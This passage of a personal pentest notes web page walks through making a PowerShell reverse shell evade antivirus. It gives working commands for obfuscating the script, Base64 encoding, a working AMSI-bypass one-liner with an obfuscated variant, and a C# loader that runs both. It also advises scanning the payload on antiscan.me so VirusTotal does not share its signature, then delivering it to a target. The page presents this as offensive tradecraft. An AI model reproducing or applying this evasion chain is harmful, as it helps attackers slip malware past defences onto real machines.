    <span class="k">if</span> <span class="p">(</span><span class="nv">$buffer</span> <span class="o">-ne</span> <span class="nv">$null</span><span class="p">)</span> <span class="p">{</span>
        <span class="nv">$buffer</span><span class="p">.</span><span class="n">Clear</span><span class="p">();</span>
        <span class="nb">Clear-Variable</span> <span class="n">-Name</span> <span class="s2">&quot;buffer&quot;</span><span class="p">;</span>
    <span class="p">}</span>
    <span class="k">if</span> <span class="p">(</span><span class="nv">$result</span> <span class="o">-ne</span> <span class="nv">$null</span><span class="p">)</span> <span class="p">{</span>
        <span class="nb">Clear-Variable</span> <span class="n">-Name</span> <span class="s2">&quot;result&quot;</span><span class="p">;</span>
    <span class="p">}</span>
    <span class="k">if</span> <span class="p">(</span><span class="nv">$data</span> <span class="o">-ne</span> <span class="nv">$null</span><span class="p">)</span> <span class="p">{</span>
        <span class="nb">Clear-Variable</span> <span class="n">-Name</span> <span class="s2">&quot;data&quot;</span><span class="p">;</span>
    <span class="p">}</span>
    <span class="no">[System.GC]</span><span class="p">::</span><span class="n">Collect</span><span class="p">();</span>
<span class="p">}</span>
</code></pre></div></p>
<h3 id="download-invoke-obfuscator">Download Invoke-Obfuscator<a class="headerlink" href="#download-invoke-obfuscator" title="Permanent link">&para;</a></h3>
<p>Download <code>Invoke-Obfuscator</code> from the following Github <a href="https://raw.githubusercontent.com/ivan-sincek/powershell-reverse-tcp/master/src/powershell_reverse_tcp.ps1">repository</a>. </p>
<h3 id="obfuscate-the-reverse-shell-ps-script">Obfuscate the Reverse Shell PS Script<a class="headerlink" href="#obfuscate-the-reverse-shell-ps-script" title="Permanent link">&para;</a></h3>
<p>In Windows host, run: </p>
<div class="highlight"><pre><span></span><code><span class="n">powershell</span> <span class="n">-exec</span> <span class="n">bypass</span>
<span class="nb">Import-Module</span> <span class="p">.\</span><span class="nb">Invoke-Obfuscation</span><span class="p">.</span><span class="n">psd1</span>
<span class="nb">Invoke-Obfuscation</span>
</code></pre></div>
<p>After running <code>Invoke-Obfuscation</code> run:</p>
<div class="highlight"><pre><span></span><code><span class="nb">Invoke-Obfuscation</span><span class="p">&gt;</span> <span class="nb">set </span><span class="n">scriptpath</span> <span class="p">&lt;</span><span class="n">name</span> <span class="n">of</span> <span class="n">reverse</span> <span class="n">tcp</span> <span class="n">script</span><span class="p">&gt;.</span><span class="n">ps1</span>
<span class="nb">Invoke-Obfuscation</span><span class="p">&gt;</span> <span class="n">string</span>
<span class="nb">Invoke-Obfuscation</span><span class="p">\</span><span class="n">String</span><span class="p">&gt;</span> <span class="n">1</span>
</code></pre></div>
<p>The above script will obfuscate all strings in <code>reverse-tcp.ps1</code> script. Now, copy the result into file. I'll name it as <code>obf-reverse.ps1</code>, or type <code>out</code> in <code>Invoke-Obfuscation</code> to write the results into a file. </p>
<h3 id="obfuscate-the-obfuscated-script">Obfuscate the Obfuscated Script<a class="headerlink" href="#obfuscate-the-obfuscated-script" title="Permanent link">&para;</a></h3>
<p>Run <code>PowerShell ISE</code> and install <code>steroids</code>. Link: <a href="https://powershell.one/isesteroids/quickstart/install-manually">https://powershell.one/isesteroids/quickstart/install-manually</a></p>
<div class="admonition tip">
<p class="admonition-title">Tip</p>
<p>Install it manually by downloading the compressed ZIP file. In order to avoid any errors in installation part.</p>
</div>
<p>After installing <code>steroids</code> tool, open PowerShell ISE and run the following command: </p>
<p><div class="highlight"><pre><span></span><code><span class="nb">start-steroids</span>
</code></pre></div>
Create new <code>PS</code> script and paste the obfuscated powershell script. In <strong>Tools</strong> menu, select <strong>Obfuscate Code</strong> and choose <strong>Binary</strong> mode.</p>
<p><img alt="" src="../assets/image-20211105040917127.png" /></p>
<h3 id="encode-the-obfuscated-ps-script">Encode the Obfuscated PS Script<a class="headerlink" href="#encode-the-obfuscated-ps-script" title="Permanent link">&para;</a></h3>
<p>Now encode the last obfuscated PowerShell script into Base64. 
<div class="highlight"><pre><span></span><code><span class="nb">PS </span><span class="p">&gt;</span> <span class="nv">$file</span><span class="p">=</span><span class="s2">&quot;&lt;obfuscated ps script&gt;&quot;</span>
<span class="nb">PS </span><span class="p">&gt;</span> <span class="nv">$fc</span><span class="p">=</span><span class="nb">get-content</span> <span class="nv">$file</span>
<span class="nb">PS </span><span class="p">&gt;</span> <span class="nv">$byt</span><span class="p">=</span><span class="no">[System.Text.Encoding]</span><span class="p">::</span><span class="n">UTF8</span><span class="p">.</span><span class="n">GetBytes</span><span class="p">(</span><span class="nv">$fc</span><span class="p">)</span>
<span class="nb">PS </span><span class="p">&gt;</span> <span class="nv">$encodedtext</span><span class="p">=</span><span class="no">[System.Convert]</span><span class="p">::</span><span class="n">ToBase64String</span><span class="p">(</span><span class="nv">$byt</span><span class="p">)</span>
<span class="nb">PS </span><span class="p">&gt;</span> <span class="nb">echo </span><span class="nv">$encodedtext</span>
</code></pre></div></p>
<h3 id="bypass-amsi">Bypass AMSI<a class="headerlink" href="#bypass-amsi" title="Permanent link">&para;</a></h3>
<p>Now let's move on the AMSI part,we need first to bypass the AMSI then we can run our reverse shell script. Again we will use here <code>PowerShell ISE</code> to obfuscate the script.  </p>
<p>Get any AMSI bypass method from the following link: <a href="https://github.com/S3cur3Th1sSh1t/Amsi-Bypass-Powershell">https://github.com/S3cur3Th1sSh1t/Amsi-Bypass-Powershell</a></p>
<p><strong>Example:</strong> </p>
<p><div class="highlight"><pre><span></span><code><span class="no">[Ref]</span><span class="p">.</span><span class="n">Assembly</span><span class="p">.</span><span class="n">GetType</span><span class="p">(</span><span class="s1">&#39;System.Management.Automation.AmsiUtils&#39;</span><span class="p">).</span><span class="n">GetField</span><span class="p">(</span><span class="s1">&#39;amsiInitFailed&#39;</span><span class="p">,</span><span class="s1">&#39;NonPublic,Static&#39;</span><span class="p">).</span><span class="n">SetValue</span><span class="p">(</span><span class="nv">$null</span><span class="p">,</span><span class="nv">$true</span><span class="p">)</span>
</code></pre></div>
In <code>PowerShell ISE</code> create a new PS script and paste the AMSI bypass link. In <strong>Tools</strong> menu, select <strong>Obfuscate Code</strong> and choose <strong>Character</strong> mode. 
Example of the generated obfuscated script: </p>
<div class="highlight"><pre><span></span><code><span class="no">[Ref]</span><span class="p">.</span><span class="n">Assembly</span><span class="p">.</span><span class="n">GetType</span><span class="p">($(</span><span class="no">[Text.Encoding]</span><span class="p">::</span><span class="n">Unicode</span><span class="p">.</span><span class="n">GetString</span><span class="p">(</span><span class="no">[Convert]</span><span class="p">::</span><span class="n">FromBase64String</span><span class="p">(</span><span class="s1">&#39;UwB5AHMAdABlAG0ALgBNAGEAbgBhAGcAZQBtAGUAbgB0AC4AQQB1AHQAbwBtAGEAdABpAG8AbgAuAEEAbQBzAGkAVQB0AGkAbABzAA==&#39;</span><span class="p">)))).</span><span class="n">GetField</span><span class="p">($(</span><span class="no">[Text.Encoding]</span><span class="p">::</span><span class="n">Unicode</span><span class="p">.</span><span class="n">GetString</span><span class="p">(</span><span class="no">[Convert]</span><span class="p">::</span><span class="n">FromBase64String</span><span class="p">(</span><span class="s1">&#39;YQBtAHMAaQBJAG4AaQB0AEYAYQBpAGwAZQBkAA==&#39;</span><span class="p">))),$(</span><span class="no">[Text.Encoding]</span><span class="p">::</span><span class="n">Unicode</span><span class="p">.</span><span class="n">GetString</span><span class="p">(</span><span class="no">[Convert]</span><span class="p">::</span><span class="n">FromBase64String</span><span class="p">(</span><span class="s1">&#39;TgBvAG4AUAB1AGIAbABpAGMALABTAHQAYQB0AGkAYwA=&#39;</span><span class="p">)))).</span><span class="n">SetValue</span><span class="p">(</span><span class="nv">$null</span><span class="p">,</span><span class="nv">$true</span><span class="p">)</span>
</code></pre></div>
<p>Save the generated script into the local machine. Example as <code>amsi.txt</code>. </p>
<h3 id="memes-break">Memes Break <img alt="😆" class="twemoji" src="https://twemoji.maxcdn.com/v/latest/svg/1f606.svg" title=":laughing:" /><a class="headerlink" href="#memes-break" title="Permanent link">&para;</a></h3>
<p>Before we continue, let's have a short memes break:  </p>
<p><img alt="" src="../assets/ex9uca2h7r131.jpg" /></p>
<p><img alt="" src="../assets/5t1wmm.jpg" /></p>
<p>Now move on to build our executable binary and deliver it into the target. </p>
<h3 id="building-the-executable-file">Building the Executable File<a class="headerlink" href="#building-the-executable-file" title="Permanent link">&para;</a></h3>
<p>Now we have two scripts: <code>amsi.txt</code> and <code>obf-tcp.ps1</code>, we will combine both those scripts and convert them into executable binary using <code>C Sharp</code> with the help Visual Studio.</p>
<p>Let's run Visual Studio now and create new <code>C Sharp</code> project. First of all, we have to enable the <code>System.Management.Automation</code> library in order to run PowerShell commands.  </p>
<p>Go to: <em>Project - Add Reference</em>, add the library <code>System Management Automation</code> by browsing into the following path: </p>
<div class="highlight"><pre><span></span><code><span class="nl">C</span><span class="p">:</span><span class="err">\</span><span class="n">Windows</span><span class="err">\</span><span class="n">assembly</span><span class="err">\</span><span class="n">GAC_MSIL</span><span class="err">\</span><span class="n">System</span><span class="p">.</span><span class="n">Management</span><span class="p">.</span><span class="n">Automation</span><span class="err">\</span><span class="o">*</span><span class="err">\</span><span class="n">System</span><span class="p">.</span><span class="n">Management</span><span class="p">.</span><span class="n">Automation</span><span class="p">.</span><span class="n">dll</span><span class="w"></span>
</code></pre></div>
<p><img alt="Untitled" src="../assets/Untitled.png" /></p>
<p>Syntax to run PowerShell commands can be found from the following <a href="https://docs.microsoft.com/en-us/dotnet/api/system.management.automation.powershell.addscript?view=powershellsdk-7.0.0">link</a>. </p>
<p>Use the following <code>CS</code> program and paste your AMSI bypass and reverse shell scripts in <code>bypassamsi</code> and <code>psrun</code> parameters. </p>
<p><div class="highlight"><pre><span></span><code><span class="k">using</span> <span class="nn">System</span><span class="p">;</span>
<span class="k">using</span> <span class="nn">System.Collections.Generic</span><span class="p">;</span>
<span class="k">using</span> <span class="nn">System.Linq</span><span class="p">;</span>
<span class="k">using</span> <span class="nn">System.Management.Automation</span><span class="p">;</span>
<span class="k">using</span> <span class="nn">System.Text</span><span class="p">;</span>
<span class="k">using</span> <span class="nn">System.Threading.Tasks</span><span class="p">;</span>

<span class="k">namespace</span> <span class="nn">powerreverse</span>
<span class="p">{</span>
    <span class="k">class</span> <span class="nc">Program</span>
    <span class="p">{</span>
        <span class="k">static</span> <span class="k">void</span> <span class="nf">Main</span><span class="p">(</span><span class="kt">string</span><span class="p">[]</span> <span class="n">args</span><span class="p">)</span>
        <span class="p">{</span>
            <span class="n">PowerShell</span> <span class="n">ps</span> <span class="p">=</span> <span class="n">PowerShell</span><span class="p">.</span><span class="n">Create</span><span class="p">();</span>
<span class="hll">            <span class="kt">string</span> <span class="n">bypassamsi</span> <span class="p">=</span> <span class="s">&quot;&quot;</span><span class="p">;</span>
</span><span class="hll">            <span class="kt">string</span> <span class="n">psrun</span><span class="p">=</span> <span class="s">&quot;&quot;</span><span class="p">;</span>
</span>            <span class="n">ps</span><span class="p">.</span><span class="n">AddScript</span><span class="p">(</span><span class="n">bypassamsi</span><span class="p">);</span>
            <span class="n">ps</span><span class="p">.</span><span class="n">AddScript</span><span class="p">(</span><span class="n">psrun</span><span class="p">);</span>
            <span class="n">ps</span><span class="p">.</span><span class="n">Invoke</span><span class="p">();</span>
        <span class="p">}</span>
    <span class="p">}</span>
<span class="p">}</span>
</code></pre></div>
Now compile the program. </p>
<h3 id="delivering-the-payload">Delivering The Payload<a class="headerlink" href="#delivering-the-payload" title="Permanent link">&para;</a></h3>
<div class="admonition warning">
<p class="admonition-title">WARINING</p>
<p>By uploading the malware into Virus Total, it will send the signature of the malware to Anti-Virus products, the generated payload can't be used again because it will be detected. Preferably, upload the executable file into <a href="https://antiscan.me/">https://antiscan.me/</a>  </p>
</div>
<p><img alt="qiVF2TTjJx20.png" src="../assets/qiVF2TTjJx20.png" /></p>
<p>Now you can deliver the payload in the target host to obtain clean reverse shell.</p>
<p><img alt="Untitled" src="../assets/Untitled%201.png" /></p>
<h2 id="references">References<a class="headerlink" href="#references" title="Permanent link">&para;</a></h2>
<p><a href="https://github.com/S3cur3Th1sSh1t/Amsi-Bypass-Powershell">Amsi Bypass Powershell</a><br>
<a href="https://github.com/danielbohannon/Invoke-Obfuscation">Invoke-Obfuscation</a><br>
<a href="https://docs.microsoft.com/en-us/dotnet/api/system.management.automation.powershell.addscript?view=powershellsdk-7.0.0">System Management Automation</a><br>
<a href="https://powershell.one/isesteroids/">Steroids</a></p>
                
                  
                
              
              
                


              
            </article>
          </div>
        </div>
        
      </main>
      
        
<footer class="md-footer">
  
    <nav class="md-footer__inner md-grid" aria-label="Footer">
      
        
        <a href="../../Cheatsheets/AD/" class="md-footer__link md-footer__link--prev" aria-label="Previous: General" rel="prev">
          <div class="md-footer__button md-icon">
            <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M20 11v2H8l5.5 5.5-1.42 1.42L4.16 12l7.92-7.92L13.5 5.5 8 11h12z"/></svg>
          </div>
          <div class="md-footer__title">
            <div class="md-ellipsis">
              <span class="md-footer__direction">
                Previous
              </span>
              General
            </div>
          </div>
        </a>
      
      
        
        <a href="../osint_into_da/" class="md-footer__link md-footer__link--next" aria-label="Next: From OSINT Into Domain Admin" rel="next">
          <div class="md-footer__title">
            <div class="md-ellipsis">
              <span class="md-footer__direction">
                Next
              </span>
              From OSINT Into Domain Admin
            </div>
          </div>
          <div class="md-footer__button md-icon">
            <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M4 11v2h12l-5.5 5.5 1.42 1.42L19.84 12l-7.92-7.92L10.5 5.5 16 11H4z"/></svg>
          </div>
        </a>
      
    </nav>
  
  <div class="md-footer-meta md-typeset">
    <div class="md-footer-meta__inner md-grid">
      <div class="md-footer-copyright">
        
          <div class="md-footer-copyright__highlight">
            Mohammed Al Kalbani. &copy; 2022
          </div>
        
        
        
      </div>
      
  <div class="md-footer-social">
    
      
      
        
        
      
      <a href="https://kf0k.github.io" target="_blank" rel="noopener" title="kf0k.github.io" class="md-footer-social__link">
        <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 496 512"><path d="M165.9 397.4c0 2-2.3 3.6-5.2 3.6-3.3.3-5.6-1.3-5.6-3.6 0-2 2.3-3.6 5.2-3.6 3-.3 5.6 1.3 5.6 3.6zm-31.1-4.5c-.7 2 1.3 4.3 4.3 4.9 2.6 1 5.6 0 6.2-2s-1.3-4.3-4.3-5.2c-2.6-.7-5.5.3-6.2 2.3zm44.2-1.7c-2.9.7-4.9 2.6-4.6 4.9.3 2 2.9 3.3 5.9 2.6 2.9-.7 4.9-2.6 4.6-4.6-.3-1.9-3-3.2-5.9-2.9zM244.8 8C106.1 8 0 113.3 0 252c0 110.9 69.8 205.8 169.5 239.2 12.8 2.3 17.3-5.6 17.3-12.1 0-6.2-.3-40.4-.3-61.4 0 0-70 15-84.7-29.8 0 0-11.4-29.1-27.8-36.6 0 0-22.9-15.7 1.6-15.4 0 0 24.9 2 38.6 25.8 21.9 38.6 58.6 27.5 72.9 20.9 2.3-16 8.8-27.1 16-33.7-55.9-6.2-112.3-14.3-112.3-110.5 0-27.5 7.6-41.3 23.6-58.9-2.6-6.5-11.1-33.3 2.6-67.9 20.9-6.5 69 27 69 27 20-5.6 41.5-8.5 62.8-8.5s42.8 2.9 62.8 8.5c0 0 48.1-33.6 69-27 13.7 34.7 5.2 61.4 2.6 67.9 16 17.7 25.8 31.5 25.8 58.9 0 96.5-58.9 104.2-114.8 110.5 9.2 7.9 17 22.9 17 46.4 0 33.7-.3 75.4-.3 83.6 0 6.5 4.6 14.4 17.3 12.1C428.2 457.8 496 362.9 496 252 496 113.3 383.5 8 244.8 8zM97.2 352.9c-1.3 1-1 3.3.7 5.2 1.6 1.6 3.9 2.3 5.2 1 1.3-1 1-3.3-.7-5.2-1.6-1.6-3.9-2.3-5.2-1zm-10.8-8.1c-.7 1.3.3 2.9 2.3 3.9 1.6 1 3.6.7 4.3-.7.7-1.3-.3-2.9-2.3-3.9-2-.6-3.6-.3-4.3.7zm32.4 35.6c-1.6 1.3-1 4.3 1.3 6.2 2.3 2.3 5.2 2.6 6.5 1 1.3-1.3.7-4.3-1.3-6.2-2.2-2.3-5.2-2.6-6.5-1zm-11.4-14.7c-1.6 1-1.6 3.6 0 5.9 1.6 2.3 4.3 3.3 5.6 2.3 1.6-1.3 1.6-3.9 0-6.2-1.4-2.3-4-3.3-5.6-2z"/></svg>
      </a>
    
      
      
        
        
      
      <a href="https://instagram.com/kf0k" target="_blank" rel="noopener" title="instagram.com" class="md-footer-social__link">
        <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 448 512"><path d="M224.1 141c-63.6 0-114.9 51.3-114.9 114.9s51.3 114.9 114.9 114.9S339 319.5 339 255.9 287.7 141 224.1 141zm0 189.6c-41.1 0-74.7-33.5-74.7-74.7s33.5-74.7 74.7-74.7 74.7 33.5 74.7 74.7-33.6 74.7-74.7 74.7zm146.4-194.3c0 14.9-12 26.8-26.8 26.8-14.9 0-26.8-12-26.8-26.8s12-26.8 26.8-26.8 26.8 12 26.8 26.8zm76.1 27.2c-1.7-35.9-9.9-67.7-36.2-93.9-26.2-26.2-58-34.4-93.9-36.2-37-2.1-147.9-2.1-184.9 0-35.8 1.7-67.6 9.9-93.9 36.1s-34.4 58-36.2 93.9c-2.1 37-2.1 147.9 0 184.9 1.7 35.9 9.9 67.7 36.2 93.9s58 34.4 93.9 36.2c37 2.1 147.9 2.1 184.9 0 35.9-1.7 67.7-9.9 93.9-36.2 26.2-26.2 34.4-58 36.2-93.9 2.1-37 2.1-147.8 0-184.8zM398.8 388c-7.8 19.6-22.9 34.7-42.6 42.6-29.5 11.7-99.5 9-132.1 9s-102.7 2.6-132.1-9c-19.6-7.8-34.7-22.9-42.6-42.6-11.7-29.5-9-99.5-9-132.1s-2.6-102.7 9-132.1c7.8-19.6 22.9-34.7 42.6-42.6 29.5-11.7 99.5-9 132.1-9s102.7-2.6 132.1 9c19.6 7.8 34.7 22.9 42.6 42.6 11.7 29.5 9 99.5 9 132.1s2.7 102.7-9 132.1z"/></svg>
      </a>
    
      
      
        
        
      
      <a href="http://linkedin.com/in/kf0k-mohammed-al-kalbani" target="_blank" rel="noopener" title="linkedin.com" class="md-footer-social__link">
        <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 448 512"><path d="M416 32H31.9C14.3 32 0 46.5 0 64.3v383.4C0 465.5 14.3 480 31.9 480H416c17.6 0 32-14.5 32-32.3V64.3c0-17.8-14.4-32.3-32-32.3zM135.4 416H69V202.2h66.5V416zm-33.2-243c-21.3 0-38.5-17.3-38.5-38.5S80.9 96 102.2 96c21.2 0 38.5 17.3 38.5 38.5 0 21.3-17.2 38.5-38.5 38.5zm282.1 243h-66.4V312c0-24.8-.5-56.7-34.5-56.7-34.6 0-39.9 27-39.9 54.9V416h-66.4V202.2h63.7v29.2h.9c8.9-16.8 30.6-34.5 62.9-34.5 67.2 0 79.7 44.3 79.7 101.9V416z"/></svg>
      </a>
    
  </div>

    </div>
  </div>
</footer>
      
    </div>
    <div class="md-dialog" data-md-component="dialog">
      <div class="md-dialog__inner md-typeset"></div>
    </div>
    <script id="__config" type="application/json">{"base": "../..", "features": ["navigation.tabs"], "translations": {"clipboard.copy": "Copy to clipboard", "clipboard.copied": "Copied to clipboard", "search.config.lang": "en", "search.config.pipeline": "trimmer, stopWordFilter", "search.config.separator": "[\\s\\-]+", "search.placeholder": "Search", "search.result.placeholder": "Type to start searching", "search.result.none": "No matching documents", "search.result.one": "1 matching document", "search.result.other": "# matching documents", "search.result.more.one": "1 more on this page", "search.result.more.other": "# more on this page", "search.result.term.missing": "Missing", "select.version.title": "Select version"}, "search": "../../assets/javascripts/workers/search.8397ff9e.min.js", "version": null}</script>
    
    
      <script src="../../assets/javascripts/bundle.1e84347e.min.js"></script>
      
    
  </body>
</html>